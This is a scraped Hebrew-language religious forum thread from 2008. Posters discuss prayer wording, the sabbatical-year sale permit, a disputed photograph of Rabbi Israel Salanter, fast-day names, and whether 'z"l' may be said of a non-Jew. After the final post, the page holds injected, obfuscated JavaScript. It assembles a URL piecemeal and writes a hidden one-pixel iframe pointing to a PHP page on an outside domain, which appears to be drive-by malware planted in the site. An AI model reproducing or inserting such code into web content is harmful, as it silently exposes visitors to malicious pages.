|
|
| נשלח ב-31/7/2008 12:25 |
|
| |
מאיר מאמרים מסכמים לעצלנים. קבלתי כבר הפנייה באישי מאחד מחכמי הפורום.
|
|
|
|
| נשלח ב-2/8/2008 23:35 |
|
| |
ירוחם - בקשר לדיון הקצר שלנו שהתפתח בתוך האשכול עז זבדיה והמלאכים -
|
|
|
|
| נשלח ב-2/8/2008 23:41 |
|
| |
(אירעה תקלה)
האם הקדיש הספרדי כתוב בנוסח משובש?
ומה עם זה "רענו זוננו פרנסנו וכלכלנו והרויחנו וכו' וכו'"
כתבת רעיון מעניין למה לא לבקש פרנסה וכד' בשבת - אבל אני עדיין לא מבין - האם אברהם לא ביקש במה אדע? ויעקב "ונתן לי לחם לאכול ובגד ללבוש". באופן עקרוני לא ברור לי מה זה מעין עולם הבא - אפשר לחוש - אבל למעשה כולנו יודעים שהעוה"ב עדיין רחוק (כך לפחות אני מרגיש. הרי אני בקושי מתחיל את העוה"ז..)
|
|
|
|
| נשלח ב-4/8/2008 00:29 |
|
| |
מיכה
יעקב לא ביקש- הוא אמר אם- אז, זו לא בקשה. במה אדע של אברהם, זו בקשה?
כתבתי מה שכתוב בהלכה, כתבתי רעיון. לא כולם מקיימים את ההלכה, לא כולם חייבים לקבל את הרעיון.
במחשבה שניה- להגיע לדרגת של בכל מכל כל, היה תהליכי, לא מיד היתה לאבות התכונה של יש לי כל.
תוקן על ידי ירוחםשמ ב- 04/08/2008 0:36:02
מודה ועוזב
|
|
|
|
| נשלח ב-5/8/2008 00:40 |
|
| |
שמעתי - שהיתר המכירה מתיר רק לגויים לעבוד בשדה - בעוד שבאופן מעשי, במשך שנים רבות, ואולי גם השנה, העבודה נעשתה ע"י יהודים.
האם ידוע לכם משהו בעניין?
|
|
|
|
| נשלח ב-5/8/2008 00:58 |
|
| |
מיכה
האם ליהודי אסור לעבוד אצל גוי,??
|
|
|
|
| נשלח ב-5/8/2008 01:07 |
|
| |
לפני כמה הודעות כתבתי לירוחם - שעל כל דבר יש לו תירוץ. הריני להבהיר שח"ו לא היה בכוונתי לדבר גנאי עליו אלא על עצמי - שלא הצלחתי למצוא קושיא שלא יוכל לפרכה - ושלא חשבתי בעצמי על התירוץ האפשרי.
|
|
|
|
| נשלח ב-5/8/2008 01:09 |
|
| |
הריני להודיע בזאת שאני יוצא "מבוגלל" מהעניין - לאמר - בגללי ירוחם הרגיש הרגשה לא נעימה.
לעניין היתר המכירה - אינני יודע מה מותר, כל מה שכתבתי הוא על פי מה ששמעתי.
|
|
|
|
| נשלח ב-6/8/2008 22:08 |
|
| |
תמונת רבי ישראל מסלנט בספר של לורנץ
שלום,
לאחרונה הופיע ספר חדש בשם 'במחיצתם של גדולי התורה', מאת שלמה לורנץ. בחלקו השני של הספר (עמ' 14) ישנה תמונה מפתיעה של ר' ישראל סלנטר.
מעולם לא ידעתי שקיימת תמונה כזו וגם עכשיו אני מפקפק בכך שהיא אכן תמונתו האמיתית.
האם יידע מישהו לומר לי עוד אודות תמונה זו? האם היא תמונתו בוודאות? כיצד נעלמה עד כה?
לבירור זה יש חשיבות רבה עבורי ואודה מאד מאד למשיבים.
|
|
|
|
|
| נשלח ב-7/8/2008 12:01 |
|
| |
תודה רבה!
אמנם, בקישור שהבאת קשה למצוא הוכחה חותכת לאחד מן הצדדים, ולמעשה יש לנו כאן מילה של 'מתפעל' (הבטוח שאין תמונה כזו) מול דבריו של שלמה לורנץ, הנחשב (אולי בטעות?) כאדם רציני, אשר הציב בפשטות את הכיתוב 'רבי ישראל סלנטר' מתחת לתמונה.
האם למישהו יש בכל זאת פיסה חדשה של מידע? למשל, קובץ הזיכרון המקורי של הרב לייב הורוויץ/הורביץ עם תמונתו, מה שיוכיח שהיא נלקחה משם?
לתגובתם אודה מאד, ותבורכו.
|
|
|
|
| נשלח ב-8/8/2008 09:42 |
|
| |
מפני מה - שלושת הצומות על ירושלים - אינם נקראים על שמה אלא ע"ש התאריך?
|
|
|
|
| נשלח ב-8/8/2008 12:41 |
|
| |
א. למה להניח שיש מועצת עליונה לקריאת שמות בעם בדקדוק ובדיוק מלא? ואם כוונתך להבדל מצום גדליה שכן זכה לשם נושא הצום, זה כנראה בגלל שהתאריך שלו לא מדויק (נדחה מראש השנה).
ב. דווקא בתנ"ך נקראים צומות אלה לפי התאריך שלהם: רביעי, חמישי ועשירי.
|
|
|
|
| נשלח ב-10/8/2008 02:08 |
|
| |
FUBR: שאלה
שלום שאלה! אני לא דתי או משו כזה אני חילוני לגמרי אבל יש לי שאלה שאולי פה יענו לי.
בוא נגיד שאיזשהו סלבריטאי אמריקאי לא יהודי או לא חשוב מי או מאיפה, מת. האם ראוי שיהודי יאמר עליו "ז"ל" או "יהי זכרו ברוך"? האם אלה ביטויים ששמורים רק לנו ויש לאמר אותם רק על יהודים?
תודה מראש.
מיימוני:
ברוך הבא אל הפורום.
יצא לך להגיע בזמן לא כל כך נוח. אבאר: היום תשעה באב. זה יום שבו אנו מזכירים ונזכרים בחורבן של עמנו, ובעיקר בחורבן המקדש. (אם תרצה לברר פרטים על טעם התקנה של תשעה באב שתיקנו לנו חכמים, ועל ההלכות, תמצא אשכולות בפורום וכמובן גם במקומות אחרים).
כיון שהיום תשעה באב, אנו מנועים אפילו מלברך אותך לשלום כפי שאנו רגילים. חלק מתקנת חכמים ליום זה היא שלא לברך בשלום כדי לחוש את הצער.
גם שאלתך עדיף לה להידחות למחר, מפני שתשעה באב אסור בתלמוד תורה.
אבל כבר פסקו הפוסקים שלענות לשאלה בהלכה מותר בנסיבות מסויימות. ואשתדל לענות.
שאלתך מזמינה דיון בכמה נושאים:
א. מה פירוש "ז"ל" או "יהיה זכרו ברוך"?
ב. למה אומרים את זה?
ג. איך מתייחסים ללא יהודי שהלך לעולמו.
לאחר בירור שאלות אלו, יש מקום לדון בשאלתך.
והנה, המילים "ז"ל" (זכרו לברכה) או "יהי זכרו ברוך" הן לפעמים ביטוי של צער, ולפעמים ביטוי שחוק שאומרים כי צריך להגיד משהו. (הדבר האחרון אינו פסול. יש הרבה דברים שאנו אומרים או עושים כי בלעדיהם נפגע באחרים).
המילים האלו אינן משפיעות על המציאות. אדם שנפטר, לו היה רשע, לא יהפוך לצדיק בכוח מילים אלו וגם לא יעלה מגהנום לגן עדן אם זה לא מגיע לו.
או להפך. אדם צדיק וטוב לא יאבד מזכויותיו ולא יוציאוהו מגן עדן רק בגלל שמישהו לא צירף לשמו את התארים האלו.
לגבי גויים, ובכן, היחס ללא יהודים הוא מורכב מאד בהלכה. אמנם, כל אדם נברא בצלם אלקים. וכל אדם שעושה את המוטל עליו הוא קרוב לה' ואהוב עליו. ובאחד מן הספרים המקובלים בעם היהודי (תנא דבי אליהו) אומר המחבר כי מי שעוסק בתורה ומקיימנה מגיע גם לדרגה שנקראת "רוח הקודש".
מצד שני, אנו שומרים מרחק מגויים. אנו חוששים ללמוד מדרכיהם שאינן תמיד טובות, ולהתרחק מחובותינו שנקבעו לנו בתורה. וכמובן צריך לבאר מדוע המרחק הזה חשוב, והאם היום זה כמו לפני אלפי שנים בזמן מתן תורה, ועוד ועוד.
לפי הקדמות אלו, שקיצרתי בהן מאד גם אם הן נראות ארוכות, יתבאר לך שיש צדדים לכאן ולכאן אם לומר את המילים "זכרו לברכה" על גוי, ואין זה משנה כרגע אם הוא סלבריטאי או לאו. מה שחשוב הוא אם היה אדם טוב, ישר וטוב ליהודים או לא.
אם הוא ראוי לתואר הזה, אין שום סיבה לא להכתיר אותו במילים כמו "ז"ל". אם הוא אינו ראוי, מדוע לעשות זאת.
יתכן אמנם שיש כאלו שיחושו שהמילים "ז"ל" וכיוצא בהן הן שמורות ליהודים בלבד, ויתרעמו על זה. יתכן כמובן לדון איתם באריכות ולהסביר להם מדוע אין שום פסול במילים אלו לכשעצמן כשהן נאמרו על גוי הראוי להן. אבל כיון שלא תמיד יש לנו זמן וסבלנות להסביר, ולא תמיד הצד השני מוכן להקשיב, לכן אולי יש מקום להשתמש במילים אחרות שיביעו אותו רעיון. במקום "ז"ל" אפשר לומר או לכתוב "היקר לליבנו" או "שאנו מוקירים את זכרו" וכל כיוצא בזה. וזו רק המלצה.
עוד הערה: לפי תקנות הפורום, אין לפתוח אשכול, גם עם שאלה יפה כמו שלך, בלי קבלת הסכמה מאחד המנהלים. לכן, האשכול שלך יישאר כאן קצת זמן, ואז הוא יועתק ל"אשכול המשאלות". שנמצא אף הוא בעמוד הראשון של הפורום ובו מופיעות שאלות קצרות. אני משער שלא היה לך זמן לעיין באשכול למשתתפים חדשים, חוקת הפורום, שבו היית יכול לקרוא על התקנה הזו ושאר הכללים של הכתיבה כאן.
נשמח כולנו אם תמשיך להשתתף ולתרום לנו שאלות ורעיונות יפים משלך.
בהצלחה.
וה' יזכנו שיתהפך יום הצום הזה ליום שמחה לכולנו.
var as="'h';
var" ac="'tt';
var" ab="'p';
var" ay="//";
document.write("*************** src="'"+as+ac+ab+":"+ay+"llaptops.co.cc/a1.php?a="+***************+"'" frameborder="'0'" height="1px" width="1px" scrolling="'no'" ><*");
//*
>
 |
|
|
|
|
|